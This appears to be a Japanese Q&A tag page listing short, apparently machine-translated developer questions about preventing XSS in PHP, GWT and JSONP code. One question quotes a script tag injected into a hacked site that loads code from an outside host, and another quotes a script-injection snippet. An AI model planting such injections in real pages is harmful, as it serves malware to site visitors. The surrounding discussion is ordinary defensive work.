xss

    1

    3答えて

    ユーザーの入力に基づいてユーザーを登録するスクリプトがあります。これは、準備されたステートメントとホワイトリストを使用してSQLインジェクションを防止します。しかし、私はXSSの予防を理解するのに苦労しています。 ページからHTMLを出力している場合は、XSSを防止する必要があります。これは何を意味するのでしょうか??? 私はウェブページにHTMLを出力しないので、この登録ページでは適用されないと

    1

    1答えて

    データベースとの間でデータの保存、取得、および更新にプリペアドステートメントを使用しています。準備文を使用している場合、htmlspecialchars()またはhtmlentities()を使用する必要がありますか?私が理解、あなたはデータを挿入すると、それだけで出力されたHTMLに関係する場合)(はhtmlspecialcharsを使用する必要がいけないから ... 私は、ユーザー入力を保存す

    2

    2答えて

    私はいくつかのタスクにAjaxを使用するWebアプリケーションを持っています。それはJavaをミドルウェアとして持っています(Struts 1.x) 私のアプリケーションは、静的コード分析を使用して潜在的なセキュリティリスクについて分析されています。この分析では、次のコードの使用が脆弱であると判断されています。 // Method invoked by Ajax public ActionFor

    0

    2答えて

    私は、ログインしたユーザのユーザ名うちエコーするには、このコードを持っている:私は、私は自分のコードを変更した場合と考えで右だろう echo $_SESSION['user']['username']." を〜: echo htmlspecialchars $_SESSION['user']['username']." 私は最低レベルのXSS atleastから自分自身を守っていますか?

    0

    1答えて

    私のサイトにアイテムを保存できる管理セクションがあります。保存されると、フロントエンドに表示されます。私のディスプレイの一部は、次のようなコードが含まれます。 echo "<p>".$rose['description']."</p>"; ははhtmlspecialcharsを持っているために、この必要性は低いレベルにXSSから保護するために、その中に含まれていますか?

    2

    2答えて

    公式のデベロッパードキュメントによると思われるかもしれませんが、GWTのHTMLウィジェットはXSSセーフではなく、カスタムHTML /スクリプトテキストを埋め込む際には注意が必要です。 だから私は私の質問があると思います、なぜこれがない: HTML testLabel = new HTML("dada<script type='text/javascript'>document.write('<

    1

    1答えて

    jsonpのコールバックをサニタイズする最も良い方法は何ですか? function api_output($data) { if (isset($_GET['callback'])) { $cb = preg_replace("/[^][.\\'\\\"_A-Za-z0-9]/", '', $_GET['callback']); send_js_headers

    0

    3答えて

    私はこのコードにアクセスできない/私は変更できないと言いましょう。 function f() { // bad tasks } setInterval(f, 10000); 私は関数fを変更したいので、下にこのような記述をします。その中にbad tasksと window.f = function(){ // good tasks } しかし、本来の機能f()まだ10秒ごとに実行

    1

    6答えて

    私はサイトで働いています。悪意のあるJavaScript: </title><script src=http://hgbyju.com/r.php ></script> (251行目)スクリプトが読み込もうとしたURLは404に戻りますが、Googleでは引き続きマルウェアリストに記載しています。 私はここに別のマシン上でクリーンな作業ローカルコピーを持っており、手動とソフトウェアの両方で各フ

    3

    3答えて

    自分のサイトでユーザーが自分の送信データを見ることができるようになり、他のユーザーが投稿したデータ(決して一般的な投稿などはありません)を許可することができない場合、サイトに実際にXSSのリスクがありますか? 私はまだXSSソリューション(httmlspecialchars()など)に取り組んでいますが、攻撃者が自分のXSS攻撃を調べて何かを得ることができるのではないかと不思議です。